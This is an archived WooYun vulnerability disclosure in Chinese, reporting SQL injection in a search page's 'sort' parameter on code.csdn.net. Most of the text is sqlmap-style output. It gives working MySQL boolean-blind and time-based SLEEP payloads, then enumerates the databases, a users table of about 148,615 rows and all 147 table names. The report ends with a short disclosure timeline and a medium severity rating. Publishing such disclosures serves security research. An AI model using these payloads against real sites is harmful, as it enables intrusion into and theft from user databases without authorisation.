乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-13: 细节已通知厂商并且等待厂商处理中 2015-10-13: 厂商已经确认,细节仅向厂商公开 2015-10-23: 细节向核心白帽子及相关领域专家公开 2015-11-02: 细节向普通白帽子公开 2015-11-12: 细节向实习白帽子公开 2015-11-27: 细节向公众公开
打卡
code.csdn.net/openyp/search_open_figure?key=1&utf8=%e2%9c%93
---Parameter: sort (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: direction=desc&sort=1 RLIKE (SELECT (CASE WHEN (1113=1113) THEN 1 ELSE 0x28 END)) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: direction=desc&sort=1 AND (SELECT * FROM (SELECT(SLEEP(5)))GANI)---back-end DBMS: MySQL 5.0.12available databases [3]:[*] `code\x04`[*] information_schema[*] mysqlDatabase: code+-------+---------+| Table | Entries |+-------+---------+| users | 148615 |+-------+---------+Database: code[147 tables]+---------------------------------+| keys || active_projects || active_users || audit_issue_logs || audit_logs || audit_merge_request_logs || audit_note_commit_logs || audit_note_issue_logs || audit_note_merge_request_logs || audit_note_project_logs || audit_note_snippet_logs || audit_note_task_logs || audit_organization_logs || audit_prohibit_logs || audit_project_logs || audit_snippet_logs || audit_user_logs || audit_user_prohibit_logs || blocks || blogs || camp_bulletins || camp_invate_codes || camp_org_users || camp_orgs || camp_proposals || camp_start_reports || camp_stus || camp_users || choice_group || code_api_ips || code_api_keys || code_api_keys_roles || code_api_permissions || code_api_roles || code_api_roles_permissions || coin_logs || coin_operates || coin_productions || coin_promotions || coins || colors || commit_notifications || contribute_docs || contribute_entries || delayed_jobs || doc_tip_offs || entry_useds || event_data || events || follows || helps || invitation_codes || invitation_notifications || invitations || invited_users || issue_notifications || issues || language_extnames || merge_request_commits || merge_request_diffs || merge_request_notifications || merge_requests || milestones || namespaces || news_associations || note_commits || note_issues || note_merge_requests || note_projects || note_snippets || note_tasks || notices || notifications || notify_types || open_figure_books || open_figure_org_error_changes || open_figure_org_projects || open_figures || open_organizations || open_source_categories || open_source_release_nodes || organization_teams || organization_teams_projects || organization_teams_users || organizations || organizations_users || pictures || project_files || project_month_ranks || project_week_ranks || projects || projects_open_source_categories || projects_tags || protected_branches || protocols || quotes || recommend_docs || repo_stars || repo_watches || schema_migrations || services || snippet_files || snippet_stars || snippets || social_action_notifications || specials || statistic_items || statistic_types || statistics || sync_projects || sys_tag_types || sys_tags || system_notifications || taggings || tags || task_audit_logs || task_bid_stars || task_bids || task_coin_assigns || task_coin_returns || task_complaints || task_injections || task_month_ranks || task_tags || task_transfers || task_week_ranks || tasks || translation_attachments || translation_bulletins || translation_members || translation_projects || translation_tasks || translation_user_workloads || upload_open_knowledge_files || user_coin_month_ranks || user_coin_week_ranks || user_logs || user_repo_downloads || user_sync_tokens || users || users_and_projects_choices || users_ignore_notify_types || users_projects || web_hooks || wikis || with_sensitive_words_items || words |+---------------------------------+
~~
危害等级:中
漏洞Rank:8
确认时间:2015-10-13 22:57
尽快修复。
暂无